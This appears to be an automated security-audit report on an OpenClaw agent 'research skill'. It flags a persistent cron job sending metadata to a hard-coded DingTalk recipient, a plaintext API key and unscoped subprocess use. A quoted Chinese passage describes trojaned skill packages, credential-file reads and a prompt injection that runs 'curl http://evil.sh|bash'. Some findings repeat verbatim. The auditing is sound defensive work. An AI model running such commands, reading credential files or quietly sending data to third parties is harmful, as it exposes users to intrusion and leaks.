T06 · System Persistence
- Location
scripts/async_runner.py:41- Finding
Persistent Cron Job Sends Research Metadata to a Hard-Coded DingTalk Recipient
- Content
View full analysis
- Remediation
View remediation
Security audit
Security checks for vulnerabilities and agentic risk
This research skill is coherent overall, but needs Review because it creates a persistent OpenClaw cron notification to a hard-coded DingTalk recipient and stores a local API key plainly.
Review this skill carefully before installing. Only use it if you are comfortable sending research queries to Zeelin, storing the Zeelin API key locally, and changing or removing the hard-coded DingTalk cron notification behavior so task metadata is not sent to an unintended recipient.
scripts/async_runner.py:41Persistent Cron Job Sends Research Metadata to a Hard-Coded DingTalk Recipient
scripts/async_runner.py:238Zeelin API Key Is Stored in Plaintext Without Restrictive File Permissions
scripts/check_zeelin_complete.py:51Server-Controlled Report URL Is Downloaded Without Destination or Size Validation
External input (network, user) flows to a code execution sink. This enables remote code execution or command injection.
# 启动后台监控 - 使用nohup确保持续运行
script = os.path.abspath(__file__)
import subprocess
subprocess.Popen(
[sys.executable, script, "--monitor", "-s", session_id, "-qid", str(question_id), "-q", args.query],
stdout=open("/tmp/zeelin-monitor.log", "a"),
stderr=open("/tmp/zeelin-monitor.log", "a"),
The skill claims autonomous background actions and user-interaction safeguards, but the finding indicates those controls are absent while local config access still occurs. Missing the required pre-use questioning and omitting disclosure of local credential/config access weakens informed consent and can expose sensitive local data usage beyond what a user expects from a research helper.
The skill claims autonomous background actions and user-interaction safeguards, but the finding indicates those controls are absent while local config access still occurs. Missing the required pre-use questioning and omitting disclosure of local credential/config access weakens informed consent and can expose sensitive local data usage beyond what a user expects from a research helper.
The skill claims autonomous background actions and user-interaction safeguards, but the finding indicates those controls are absent while local config access still occurs. Missing the required pre-use questioning and omitting disclosure of local credential/config access weakens informed consent and can expose sensitive local data usage beyond what a user expects from a research helper.
Model output is used without validation or sanitization. Unvalidated output injected into downstream contexts (SQL, shell, HTML) enables injection attacks and arbitrary code execution.
task_id = f.read().strip()
# 3. 启动后台监控(非阻塞)
subprocess.Popen([
"python3", "scripts/check_status.py",
"--task-id", task_id,
"--watch",
This section describes remote server login, log extraction, and service restart behavior via short natural-language commands without warning about authentication, change control, or rollback. In the context of an asynchronous agent skill, such framing is dangerous because it encourages direct production operations through a powerful automation layer, raising the risk of unauthorized access or accidental service disruption.
The markdown describes automated generation of trading signals and execution of trading instructions without warnings about financial loss, compliance obligations, or irreversible effects. Because the skill is positioned as an execution-capable agent, presenting trading automation without guardrails could lead users to enable unsafe autonomous financial actions.
The text describes voice-triggered control of physical devices such as ovens and air conditioning without warnings about physical safety, occupancy checks, or fail-safe requirements. In a real-world automation skill, unattended control of actuators can cause property damage, injury, or unsafe environmental conditions if triggered incorrectly or maliciously.
Code accesses credential files (SSH keys, AWS credentials, etc.). This could indicate credential theft attempts.
通报披露,截至2026年2月,已发现17个携带木马后门的技能包,累计被安装3.2万次,涉及我国IP约1.8万个[^103]。思科AI威胁研究主管曾指出,从安全角度看,OpenClaw“是一场噩梦”,因为它默认授予技能几乎等同于本地用户的系统级权限,而技能市场缺乏代码审计与签名验证[^63]。
已披露的CVE-2026-25253漏洞可致远程代码执行,CVSS评分9.8[^30]。在macOS 13环境安装“DevSkill”后,OpenClaw读取~/.ssh/config与~/.aws/credentials,根据用户一句指令自动生成可执行脚本,并调用/usr/bin/code打开VS Code调试;脚本内直接嵌入AWS Access Key ID与Secret,且被赋予0755权限。安全团队随后验证,因OpenClaw的“命令执行”技能未做沙箱隔离,攻击者可通过恶意prompt注入“curl http://evil.sh|bash”完成远程代码执行[^30]。
### 3. 隐性成本:显卡折旧、电费、VPN、心跳账单
Remote code is downloaded and executed. This bypasses code review and could introduce malicious code.
通报披露,截至2026年2月,已发现17个携带木马后门的技能包,累计被安装3.2万次,涉及我国IP约1.8万个[^103]。思科AI威胁研究主管曾指出,从安全角度看,OpenClaw“是一场噩梦”,因为它默认授予技能几乎等同于本地用户的系统级权限,而技能市场缺乏代码审计与签名验证[^63]。
已披露的CVE-2026-25253漏洞可致远程代码执行,CVSS评分9.8[^30]。在macOS 13环境安装“DevSkill”后,OpenClaw读取~/.ssh/config与~/.aws/credentials,根据用户一句指令自动生成可执行脚本,并调用/usr/bin/code打开VS Code调试;脚本内直接嵌入AWS Access Key ID与Secret,且被赋予0755权限。安全团队随后验证,因OpenClaw的“命令执行”技能未做沙箱隔离,攻击者可通过恶意prompt注入“curl http://evil.sh|bash”完成远程代码执行[^30]。
### 3. 隐性成本:显卡折旧、电费、VPN、心跳账单
The skill sends proactive notifications to a hardcoded external DingTalk recipient unrelated to the invoking user. In context, this is especially dangerous because a research skill should not covertly exfiltrate task status or outputs to a fixed third party, making this behavior consistent with unauthorized data disclosure.
This duplicate finding points to the same behavior: persistent plaintext storage of an API key in ~/.openclaw/zeelin-config.json. In the context of a skill that performs background tasks and network operations, exposed credentials could let an attacker misuse the external API or impersonate the user.
# 创建配置文件
mkdir -p ~/.openclaw
cat > ~/.openclaw/zeelin-config.json << 'EOF'
{
"api_key": "你的API_Key"
This duplicate finding points to the same behavior: persistent plaintext storage of an API key in ~/.openclaw/zeelin-config.json. In the context of a skill that performs background tasks and network operations, exposed credentials could let an attacker misuse the external API or impersonate the user.
# 创建配置文件
mkdir -p ~/.openclaw
cat > ~/.openclaw/zeelin-config.json << 'EOF'
{
"api_key": "你的API_Key"
The installation guide states that the skill will automatically send DingTalk notifications when tasks complete, but it does not clearly warn users that this causes outbound network communication and message delivery to a third-party service. Hidden or insufficiently disclosed egress is security-relevant because users may not expect task metadata, report status, or other contextual information to leave the local environment.
The skill advertises operational commands that use environment access, file reads/writes, network calls, and shell execution, but it does not declare any tool scope or permission boundaries. This is dangerous because users and hosting platforms cannot accurately understand or constrain what the skill may access, increasing the risk of unintended secret exposure, filesystem modification, or arbitrary command execution.
The skill description does not clearly warn that it performs automatic background actions and writes files, which undermines user awareness and consent. Hidden automation and persistence are risky because they can continue operating after the initial invocation and may leave artifacts or generate notifications unexpectedly.
The documentation explicitly recommends spawning local subprocesses and background monitors as part of handling research jobs, which expands the skill from a scoped API integration into general-purpose process execution. In an agent context, this creates unnecessary command-execution and persistence capabilities that can be abused or can violate least-privilege expectations for a research-only skill.
The webhook pattern sends task results to an arbitrary external URL, extending the skill's behavior from research execution to outbound data delivery. That creates a data exfiltration path if research results, prompts, or metadata are transmitted to untrusted destinations without explicit user approval and destination validation.
The documentation presents external webhook delivery without warning that task contents and results may be transmitted to a third-party server. In a deep-research skill, outputs may contain sensitive user queries, collected source material, or derived analysis, so silent outbound transfer creates a meaningful privacy and compliance risk.
This markdown file contains user-facing instructions only in Chinese, including the title and all setup steps. Under the policy, forcing a specific language without user opt-in is a natural-language policy violation unless the locale constraint is clearly documented and justified.
The markdown presents autonomous actions such as form submission, account interaction, and workflow execution as successful examples without emphasizing authorization boundaries, user confirmation, or misuse risks. In a skill ecosystem that can trigger real actions asynchronously, this can normalize unsafe use and increase the chance that operators deploy high-impact automations without adequate safeguards.
subprocess module calls execute external commands. Without careful input validation, this enables command injection.
"""创建定时任务"""
try:
# 先删除可能存在的旧任务
subprocess.run(["openclaw", "cron", "rm", CRON_JOB_NAME], capture_output=True)
# 创建新任务:每1分钟检查一次
result = subprocess.run([
"openclaw", "cron", "add",
The implementation configures 1-minute polling and a hardcoded DingTalk target, diverging from the declared 2-minute notification behavior. Security-relevant mismatches between manifest and implementation reduce transparency and can hide more invasive behavior than users expect, especially when external notifications are involved.
This code creates a recurring background cron task that proactively sends messages to a hardcoded DingTalk recipient every minute. In the context of a research skill, silently installing persistent notification behavior to an external destination exceeds expected functionality and can leak task metadata or completion events without user-specific authorization.
# 先删除可能存在的旧任务
subprocess.run(["openclaw", "cron", "rm", CRON_JOB_NAME], capture_output=True)
# 创建新任务:每1分钟检查一次
result = subprocess.run([
"openclaw", "cron", "add",
"--name", CRON_JOB_NAME,
"--every", "1m",
The code installs a background cron job that sends notifications externally without clear runtime disclosure or per-use consent. Hidden persistence and outbound messaging increase the chance of unintended data exposure and violate user expectations for a simple research task.
No suspicious patterns detected.